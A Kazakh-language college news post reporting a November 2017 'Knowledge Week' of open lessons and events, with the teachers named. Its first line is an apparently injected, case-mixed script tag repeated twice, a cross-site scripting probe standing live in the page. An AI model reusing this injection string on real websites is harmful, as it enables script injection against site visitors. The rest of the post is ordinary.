<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.11.2017

         2017 жылдың 13-17 қараша аралығында  оқу мемлекеттік тілде жүретін пәндер бойынша «Білім апталығы» өткізілді. Оқу-әдістемелік кабинет жиналысында апталықтың жоспары құрылып, кабинет мүшелері апталық барысында қандай озат тәжірибе үлгілерімен бөлісе алатынын ортаға салды. Апталық барысында Вет 115 А тобында «Нарықтық экономика негіздері» пәнінен «Ақша түрлері маңыздылығы, қызметі» ашық сабағы (оқытушы Ж.Д. Шайкенова), «Естай Мырзахметов шығармаларындағы образдар жүйесі» ашық үйірме отырысы (оқытушы Қ.Қ.Уразова), 3 және 4 курс студенттері арасында «Білгіштер бекеті» сыныптан тыс шарасы (оқытушылар Кабдырахов Б.С., Ж.С.Нұржігіт),

«Өлексені жарып сою» зертханалық-тәжірибелік сабағы (оқытушы Н.С.Мухажанов), «Зоология» пәнінен Вет 117 тобында «Балықтар класы» ашық сабағы (оқытушы Р.А.Нурмагамбетова)  сияқты шаралар өткізілді. Барлық іс-шараларға студенттер белсене қатысып, болашақ мамандықтарына деген қызығушылықтарын көрсетті.  Үздік білім көрсеткен студенттерге оқытушылар атынан алғыс айтылып, сыйлықпен ынталандырылды.

Уразова Қ.Қ., оқу әдістемелік кабинет жетекшісі

Просмотров: 829


Пікір қосу



Деректерді қолтаңбаға қосу